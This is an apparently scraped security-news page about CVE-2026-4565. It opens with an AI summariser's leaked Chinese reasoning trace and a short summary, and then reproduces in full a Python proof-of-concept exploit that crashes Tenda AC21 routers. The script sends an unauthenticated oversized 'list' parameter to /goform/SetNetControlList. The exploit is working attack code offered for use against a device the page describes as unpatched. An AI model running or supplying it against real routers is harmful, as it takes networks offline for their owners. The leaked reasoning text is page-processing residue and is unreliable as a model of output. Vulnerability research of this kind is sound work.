好的,我现在需要帮用户总结一篇关于Tenda AC21路由器漏洞的文章,控制在100字以内。首先,我得仔细阅读文章内容,抓住关键信息。 文章标题是“Tenda AC21 - Stack Buffer Overflow in SetNetControlList”,提到了CVE编号CVE-2026-4565。作者是Mohammed Idrees Banyamer,来自约旦。漏洞影响的是Tenda AC21 V1.0 V16.03.08.16版本,属于远程拒绝服务或缓冲区溢出类型,CVSS评分8.8,属于严重级别。 漏洞描述中提到,攻击者可以通过/goform/SetNetControlList接口中的“list”参数触发栈溢出。利用这个漏洞可以导致路由器崩溃或重启。目前没有官方修复。 接下来,我需要将这些信息浓缩到100字以内。重点包括:设备型号、漏洞类型、影响版本、攻击方式、后果以及是否存在修复。 然后,组织语言,确保简洁明了。比如:“Tenda AC21路由器存在栈溢出漏洞(CVE-2026-4565),影响V1.0 V16.03.08.16版本。攻击者通过SetNetControlList接口的'list'参数发送超长数据可致路由器崩溃或重启。目前无官方修复。” 这样既涵盖了关键点,又符合字数限制。 最后,检查是否有遗漏的重要信息,并确保语句通顺无误。 </think> Tenda AC21路由器存在栈溢出漏洞(CVE-2026-4565),影响V1.0 V16.03.08.16版本。攻击者通过SetNetControlList接口的'list'参数发送超长数据可致路由器崩溃或重启。目前无官方修复。 2026-3-26 08:54:45 Author: cxsecurity.com(查看原文) 阅读量:9 收藏
#!/usr/bin/env python3 # Exploit Title: Tenda AC21 - Stack Buffer Overflow in SetNetControlList # CVE: CVE-2026-4565 # Date: 2026-03-23 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://www.tenda.com.cn/ # Software Link: - # Affected: Tenda AC21 V1.0 V16.03.08.16 # Tested on: Tenda AC21 V1.0 V16.03.08.16 # Category: Remote Denial of Service / Buffer Overflow # Platform: Embedded (Linux-based router) # Exploit Type: Remote # CVSS: 8.8 (Critical) # CWE: CWE-120 (Classic Buffer Overflow) # Description: Unauthenticated stack-based buffer overflow in /goform/SetNetControlList via the "list" parameter # Fixed in: No official fix released as of March 2026 # Usage: python3 exploit.py <target_ip> # # Examples: # python3 exploit.py 192.168.0.1 # # Options: None (simple crash PoC) # # Notes: # - Triggers router crash/reboot (DoS) # - For RCE, payload crafting + ROP required (not included) # - Use only on devices you own or have explicit permission to test # # How to Use # Step 1: Connect to the target router's network # Step 2: Run the script with the router's IP address print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-4565 • Tenda AC21 SetNetControlList BOF ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import sys if len(sys.argv) != 2: print("Usage: python3 exploit.py <target_ip>") print("Example: python3 exploit.py 192.168.0.1") sys.exit(1) target_ip = sys.argv[1] url = f"http://{target_ip}/goform/SetNetControlList" payload_length = 1024 data = {"list": "A" * payload_length} print(f"[+] Sending buffer overflow payload (length={payload_length}) to {url}") print("[+] If successful, the router should crash or reboot shortly...") try: response = requests.post(url, data=data, timeout=6) print(f"[+] HTTP status: {response.status_code}") if response.text: print(f"[+] Response snippet: {response.text[:180]}...") except requests.exceptions.Timeout: print("[!] Timeout → Router likely crashed or rebooted") print("[!] Expected behavior for CVE-2026-4565") except requests.exceptions.ConnectionError: print("[!] Connection refused or reset → Router probably down") except Exception as e: print(f"[!] Error: {e}") print("\n[!] Exploit finished. Use only for authorized security testing.")
References:
https://vuldb.com/?id.352402
https://github.com/hellonestor/killallbug/issues/14
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh